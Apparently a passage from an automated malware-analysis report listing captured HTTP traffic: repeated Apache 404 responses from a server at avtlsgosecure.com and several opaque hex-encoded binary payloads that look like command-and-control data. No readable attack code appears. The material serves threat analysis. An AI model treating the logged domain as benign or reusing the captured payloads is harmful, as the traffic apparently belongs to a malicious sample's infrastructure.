17 4b 65 f2 df 8e 82 e1 f9 e4 1f 5e a1 90 4e a1 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 5e 54 ab de 08 0d 75 8f b7 af 57 a3 04 99 85 1f d4 dc 7a 91 9c 29 06 f1 2c 5e ae 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca 92 b6 3b 35 2d 11 6d 43 58 b9 8b 8b e1 72 69 d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b a3 e3 a6 b4 47 30 80 e3 1c 78 66 e3 52 48 e4 29 96 4d cb e7 17 3f dc e5 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca e2 cf 25 4e b1 e0 a3 9c 04 98 c3 a7 0d c3 fd d4 5f 59 6a 43 9c 39 34 62 18 3e 1d f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 a3 Data Ascii: 4dc`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j3S5sj=3wE|WD-<P%Q"?f=(*jC\SMUbT[U&XJ3Ob>!+:V?#BSSR+{~ExU$O~i~_1zN,%Qa>|(HkJ{
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 17 Oct 2022 20:06:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vkHqKg5vyXTimHZFe9tYdqMPuqfUY%2Fpg1rG8PBkOrVnw1Y9bIBgDBAnzaPSgrCYUG86718Mr4lfZNwg7zuRNN9zxFXE3QXVUSwcrxLhwLa6eNaKlXUkXtWzrwHPHWFgLog%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 75bba805de2806d1-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 147<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:11 GMTserver: Apache/2.4.41 (Ubuntu)transfer-encoding: chunkedcontent-type: text/html; charset=utf-8Data Raw: 32 42 34 33 0d 0a 53 00 00 00 8f 3b 45 34 46 2c cf 60 b9 6a 5a 56 fd aa f0 00 44 2e f9 96 b4 f0 a5 47 03 af d5 2e f1 b0 70 50 db a4 94 f0 31 a2 da 8c a0 37 bd 47 9a a0 1b 43 cd 66 5d 8b 58 3b b5 cc d7 06 9a e2 13 8c 8d 91 f8 2b a4 1e 31 f3 d8 ca f9 e4 dd 3b f9 1c 88 21 b0 c2 f0 00 ca 74 02 00 1c ac 2b da 00 0b 07 00 09 00 34 00 00 01 54 b5 a6 04 fa 19 13 50 fe ad bf fe 50 01 0b 00 6b 6d 9b a1 be 47 6b 95 bb 2f 20 d4 c8 8f 3e f9 48 d9 5d 6d 65 6d 75 16 dc 93 04 9a 4e 3d 6e 00 a7 fb c4 e6 ba 10 81 4e de c9 81 63 bd 6b c1 21 12 08 03 82 92 b9 66 33 2c c4 d8 a4 26 81 d2 23 e6 f5 f0 39 01 b1 f6 c3 ff ed 03 02 bb a2 cb aa 25 f7 50 36 a5 43 cb 97 a8 89 2f 73 18 41 7c 38 c8 25 6c e3 2a 3c 5c 31 22 93 fa eb 08 47 0a cb 81 c7 f6 64 05 28 c2 6a 21 d2 ce 9f ad 76 7d 4a 1a d8 92 2f 8c 78 c6 24 f2 d6 cf 6b fb c5 e7 05 b0 1f 95 8d a2 26 fc ad 77 7d 1f 5b 65 2f 3f 20 47 56 ae f1 94 d8 e8 af 02 9c 35 87 be c3 a6 6b 91 75 5d 48 ac 3a 7e a2 d9 1c ad 62 4f e2 8d fa e3 a9 4d d6 02 65 2c a5 97 c6 61 03 59 fc 1d d4 88 16 72 64 45 ef 71 50 7d 98 6f 6e 3b 4c 4a 24 46 46 d2 e5 01 0f 29 c5 77 b5 91 d2 cf 70 47 4e 70 90 b9 1a e8 a3 c8 f4 35 b3 7d 94 47 eb 9e 1c 83 1b 9f 2b 04 01 20 1b 5d 82 c5 96 4e c0 54 3b 64 88 1b 82 ad a0 f7 12 e2 23 b3 67 bd 67 b8 6c d5 2e df 89 bb 99 b8 f8 a8 37 72 14 26 37 4c 36 33 93 ea 14 9f fc 79 88 6c 52 f9 4b a8 4b 79 72 fe 17 4a 97 56 fc 2c 49 19 fe ac 9b 63 57 59 57 b2 6d 42 86 48 71 26 85 c8 e9 46 b3 be 7d 6e 49 77 a0 bc d7 28 3b 4d 72 ba 0f 96 20 d8 e2 f0 06 2a 13 f4 31 f3 75 9d 49 ed a3 a9 16 2a be 8b 64 65 69 55 b5 88 be 3d 47 b3 fd d6 b1 69 98 52 de 77 cb ee 26 12 15 57 48 43 74 87 cc a7 87 b5 da 57 bd 62 db 5b 02 16 5b 43 da 83 e9 7d eb 69 ba cb 94 e0 d3 9c 36 d6 e8 5e 61 b8 d3 7c 0b 4f 5f d4 5f 20 84 6f 29 33 35 f8 06 1c 4b 74 4f 8b c3 37 09 e9 f0 3f 99 f4 29 aa d7 6c e4 9b 7d 8d 35 38 05 d8 ed 28 87 b4 7c 23 20 1a 4c 17 4f d3 f2 78 47 99 4d 46 4c ff 34 b5 cf ce 58 f4 58 6b ff 58 95 63 70 fe 45 7b 44 6a 9d 01 70 a4 96 d5 37 e9 53 35 1c ec 0d 77 3d 02 33 8a 5d 4f 02 f9 f2 29 23 5a ba c1 49 cd e4 b9 8f de 25 c8 51 82 ca ba 10 3a 0d e9 c9 3c 79 23 63 02 10 48 3f 91 d7 9d ee 95 29 de 70 a0 eb 9f 55 33 e8 17 3e 67 82 d3 5f 4a b1 d1 1c b2 35 6f e1 d4 36 68 1c b3 19 84 3c 49 ae 3a bf 98 c3 68 29 98 be f9 8d 66 0e 59 d3 88 1d a4 ea 06 bc 7f ab de 5a 8a 42 d8 ab 4a ed 7b 02 99 5f 31 df c6 ae 1b 3c a7 00 1c 42 02 01 1b 9b b8 5a 93 aa ba 49 d3 17 c5 0a f3 97 e0 63 f3 d1 e5 b9 41 bb 2a 06 24 ad af b9 25 17 3b f1 9b 84 1e ce 34 9c 3a 66 91 81 a2 ef 69 19 74 61 e8 33 37 39 af ed b1 65 c2 c3 f9 b0 fa f4 1c 64 c9 43 62 b0 fb e1 82 2e 1e ff a9 5b 8f 2c 06 1c 99 47 12 ba b9 cb de a6 fb 99 d6 48 4c ef 17 cd 38 c0 b1 f7 5c 4d 17 a5 55 86 f6 0f 6e 91 4f 16 df 22 08 2a 6e 37 d0 e4 00 c5 68 60 4a 30 1a 94 6b 3c 70 15 50 86 ac e2 b2 6c 59 c9 04 da 97 f7 61 7d 85 31 2d cb 9f 14 c0 72 fd 91 84
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:12 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 73content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba ee 18 29 85 ef 94 f9 20 b0 8d 91 bb 22 ac 5a 91 b8 06 6e da 3c 43 8f 5c 29 bd c0 ce 1c cc fb 51 80 9d c4 f6 3e ba 45 33 e2 d3 Data Ascii: %S`Nh&WQY^&) "Zn<C\)Q>E3
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:16 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 44content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ef 8f bc e6 af 09 5d b9 dd 65 f6 f5 10 75 9b eb 8b f1 32 ae ce 95 a4 68 Data Ascii: %S`Nh&WQY^]eu2h
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:20 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:21 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 39content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ef 8f bc e6 af 09 5d b9 dd 65 f6 f5 10 75 c6 a4 83 ec 24 Data Ascii: %S`Nh&WQY^]eu$
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:24 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:24 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:24 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:24 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 91content-type: text/html; charset=utf-8Data Raw: 00 00 25 53 10 60 4e 7f dc 68 ea 26 57 51 ec bb f1 59 03 5e ec 8a ac fd a3 18 07 bf df 26 ba f2 18 36 9d ba 91 a4 33 b2 84 c1 ee 22 8f 42 93 aa 2f 7d d3 72 49 97 04 74 b1 d6 88 1f 82 f7 47 df b5 ce e2 3a bd 07 22 c5 83 a1 a4 b4 f8 6e fc 00 8f 21 a4 c7 f0 3a 57 2a 14 4c 94 Data Ascii: %S`Nh&WQY^&63"B/}rItG:"n!:W*L
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:25 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:25 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:25 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 76 74 6c 73 67 6f 73 65 63 75 72 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at avtlsgosecure.com Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Founddate: Mon, 17 Oct 2022 20:07:26 GMTserver: Apache/2.4.41 (Ubuntu)content-length: 405content-type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 